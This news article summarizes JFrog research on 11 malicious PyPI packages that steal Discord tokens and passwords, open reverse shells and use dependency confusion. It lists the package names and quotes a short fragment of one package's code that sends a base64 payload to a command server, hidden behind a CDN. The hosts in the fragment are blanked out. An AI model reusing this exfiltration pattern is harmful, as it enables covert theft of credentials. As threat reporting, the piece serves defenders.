Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors

Security specialists from the firm JFrog report the discovery of 11 malicious Python packages in the Python Package Index (PyPI) repository, apparently designed for the theft of access tokens to platforms such as Discord, in addition to intercepting passwords and deploying dependency confusion attacks.

The list of malicious packages detected in this research is shown below:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10/10Cent11
  • yandex-yt
  • yiffparty

Among these packages, experts note that “importantpackage”,” “10Cent10” and “10Cent11” seem to establish an inverse layer on the compromised machine. In addition, “importantpackage” abuses the TLS CDN termination for data theft, in addition to using Fastly CDN to hide malicious communications with the C&C server.

According to the report, the communication code for this malware is:

url = “” + “/images” + “?” + “guid=” + b64_payload

r = request.Request(url, headers = {‘Host’: “”})

The researchers note that this code causes an HTTPS request to be sent to which is subsequently redirected by the CDN as an HTTP request to the C2 server

The dependency confusion technique involves loading contaminated components that have the same name as legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique is really good for tricking package managers into downloading and installing malicious modules.

The researchers conclude by mentioning that while this is an attack similar to other hacking techniques, it does give threat actors a way to act stealthily, plus it could function as the prelude to subsequent attacks.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.